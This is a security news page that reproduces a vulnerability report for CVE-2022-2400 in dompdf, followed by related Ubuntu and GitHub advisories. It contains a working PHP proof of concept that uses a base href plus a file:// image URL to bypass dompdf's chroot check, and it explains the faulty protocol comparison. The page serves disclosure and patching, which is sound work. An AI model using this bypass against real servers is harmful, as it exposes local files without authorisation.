Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-2400: External Control of File Name or Path in dompdf

External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.

CVE
#vulnerability#linux#git#php#pdf#auth

Description

The Scenario 3 you described in this report (https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/) actually opens up the ability to bypass chroot checks.

Proof of Concept

1: Make sure you install Dompdf from GitHub (https://github.com/dompdf/dompdf/) and include the following autoload.inc.php in dompdf/autoload.inc.php:

<?php
/**
 * @package dompdf
 * @link    http://dompdf.github.com/
 * @author  Benj Carson <[email protected]>
 * @author  Fabien Ménager <[email protected]>
 * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
 */

// HMLT5 Parser
require_once __DIR__ . '/lib/html5lib/Parser.php';

// Sabberworm
spl_autoload_register(function($class)
{
    if (strpos($class, 'Sabberworm') !== false) {
        $file = str_replace('\\', DIRECTORY_SEPARATOR, $class);
        $file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php');
        if (file_exists($file)) {
            require_once $file;
            return true;
        }
    }
    return false;
});

// php-font-lib
require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php';

//php-svg-lib
require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php';


/*
 * New PHP 5.3.0 namespaced autoloader
 */
require_once __DIR__ . '/src/Autoloader.php';

Dompdf\Autoloader::register();

2: With a sample image file cat.jpg in /var/www/html/cat.jpg, (find any photo will do):

3: Create vuln2.php:

<?php
// Include autoloader 
require_once 'dompdf/autoload.inc.php'; 

// Reference the Dompdf namespace 
use Dompdf\Dompdf; 
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);

$dompdf = new Dompdf($options);

// Load HTML content 
$dompdf->loadHtml('<base href="http://example.com"><img src="file:///var/www/html/cat.jpg" />');

// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape'); 
 
// Render the HTML as PDF 
$dompdf->render(); 
 
// Output the generated PDF to Browser 
$dompdf->stream(); 

?>

If you visit the above in the browser you should see cat.jpg image being included into the PDF file even though chroot option is not set.

Impact

This vulnerability is capable of bypassing chroot checks essentially leading to disclosure of png and jpeg files. This was tested with allow_url_fopen and on Linux. Additionally, this was tested on a fresh install of dompdf.

Analysis:

This bug occurs because in Line 68:

$remote = ($protocol && $protocol !== "file://") || ($parsed_url['protocol'] != "");


($protocol && $protocol !== "file://") => True ( http:// !== file:// )

Therefore, the file:///var/www/html/cat.jpg will be treated as a remote file without the need for chroot checks.

Related news

Ubuntu Security Notice USN-6277-2

Ubuntu Security Notice 6277-2 - USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.

Ubuntu Security Notice USN-6277-1

Ubuntu Security Notice 6277-1 - It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS. It was discovered that Dompdf was not properly validating processed HTML content that referenced PHAR files, which could result in the deserialization of untrusted data. An attacker could possibly use this issue to execute arbitrary code.

GHSA-5qj8-6xxj-hp9h: Dompdf before v2.0.0 vulnerable to chroot check bypass

Dompdf prior to version 2.0.0 is vulnerable to a chroot check bypass, which could cause disclosure of png and jpeg files.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907